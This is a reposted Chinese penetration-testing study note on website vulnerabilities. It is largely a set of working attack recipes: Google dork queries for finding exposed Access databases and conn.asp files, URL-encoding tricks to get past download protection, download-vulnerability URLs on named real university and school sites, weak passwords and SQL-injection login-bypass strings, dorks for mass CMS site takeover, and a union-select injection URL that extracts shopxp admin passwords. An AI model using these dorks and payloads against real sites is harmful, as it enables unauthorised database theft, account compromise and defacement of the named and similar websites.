滲透測試學習 七、 漏洞分析


弱漏洞利用網站

  網站暴庫漏洞

    暴庫(常是Access數據庫,文件格式:data.mdb;SQLserver、MySQL--->數據庫連接文件),就是通過一些技術或者程序漏洞得到數據庫的地址,並將數據庫非法下載到本地,

    hacker非常樂意這種事件的發生,在得到網站數據庫之后,就可以得到網站管理員的賬號和密碼,對網站進行破壞與管理,也能通過數據庫的道德網站的隱私信息,甚至是最高權限。(目錄遍歷漏洞)

    利用方法

      inurl:/inc/conn.asp

      inurl:inc+conn.asp to parent directort intext:

      inurl:/inc/conn.asp

      inurl:/inc+conn.asp to parent dirctory

      所有可以目錄瀏覽的網頁都有一些相同的地方,主要有以下幾點:

      to parent directory

      last madifief Description

      轉到父目錄

      而利用Google語法來搜索的語句有:

      intitle  intext  inurl  site  filetype等

      搜索域名后綴,常見的域名后綴有:

      com  net  mil  org  info  gov  edu  biz  coop  areo  pro  int  arpa

      e.g

      intext:to parent directory + intext:mdb site:fudan.edu.cn

      inc/conn.asp--->inc%5cconn.asp(MySQL數據庫與可能的路徑)

    暴庫繞過、過防下載

      #sdsf.mdb

      下載時改成 %23sdsf.mdb

      #@!$%^&*asfkladsf@!#.mdb

      %23@%21%24%25%5E%26%2aasdfkladsf@%21%23.mdb

      高級語法暴庫

        inurl:./.. admin ../.. add..

        inurl:./.. admin../..del..

        inurl:/.asp <id=<%<%<%

    下載漏洞

      http://ipo.snnu.edu.cn/

      http://ipo.snnu.edu.cn/shida/UploadFiles/indentAttFile/201206122041778.doc

      http://ipo.snnu.edu.cn/down.asp?fileup=shida/UploadFiles/indentAttFile/2012061222041778.doc

      http://www.sxzzy.cn/ggis/news/down.asp?FileName=doc/2101-5/2012053010329973.doc

      下載漏洞利用

        通過蜘蛛爬行,找到該URL,下載conn.asp  config.php  config.asp  db.mdb

    網站后台密碼爆破(弱口令 bp)

      為了方便管理網站,cms系統暢游管理員后台管理接口,輸入賬號密碼登錄進行管理

      常見后台

      網站常見的cms管理系統有:

      織夢  idscuz  帝國  phpweb  WordPress  aspcms  科訊  南方  良精  ecshop等

      對應的后台:

      dede  admin.php  e/admin  admin.php  wp-admin  admin  admin  admin  admin  admin

      還有可能:manager  login_admin  login_manage  login.asp

    弱口令猜解

      常見弱口令:admin  admin888  admin123  123456等等

      邏輯萬能秘鑰:

      asp--> 'ro' = 'or'

      php--> admin' or 1=1==  admin' or '1'='1

      破解工具:burpsuite  discuz破解器  py腳本  httpfuzzer(針對帶驗證碼的)

      針對性的一些工具:PKav HTTP Fuzzer

      將找到的請求包放進去(請求地址,請求包),對密碼部分添加標記,對驗證碼部分添加標記,然后暴力破解。

    網站漏洞EXP的利用

      EXP是exploit(漏洞利用)的縮寫。當我們cms出現漏洞的時候,針對漏洞原理可以寫出針對該漏洞的exploit。

      有的時候exp可以直接添加管理員或者getshell,爆出管理員賬號密碼,數據庫賬號密碼。

      EXP利用

        主流網站基本上都有漏洞和exp

        e.g 織夢  phpcms  strusl  phpweb ...

      EXP收集

        百度  交流  利用工具  

      批量檢測站點

        常用於某一類型的漏洞站點的安全檢測

      批量拿站

        關鍵詞:

          有限公司 -- powered by AspCMS v2.0

          powered by AspCms 2

          powered by AspCms 2.0

          AspCms 2.0

          powere

        關鍵字:inurl:newgoods.asp:action_key_order=news

        利用方法:admin_shopxp/upLoad_bm.asp

        漏洞利用:phpweb漏洞

        關鍵字:

          inurl:/class/?1.html

          inurl:class/index.php?catid=0

          inurl:/page/html/?1.html

          inurl:news/html/?411.htm

          默認后台地址:/admin.php

      注入地址:

        down/class/index.php?myord=1

        news/class/index.php?showtag=

        萬能密碼  admin 'or '1' =' 1

        織夢批量,搜索關鍵字:

        powered by DedeCMS_V57_UTF8_SP12004-2011 DesDev LNC

        inurl:shopxp_news.asp

        TEXTBOX2.Asp?action=madify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin

2019-04-25  11:02:43      


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM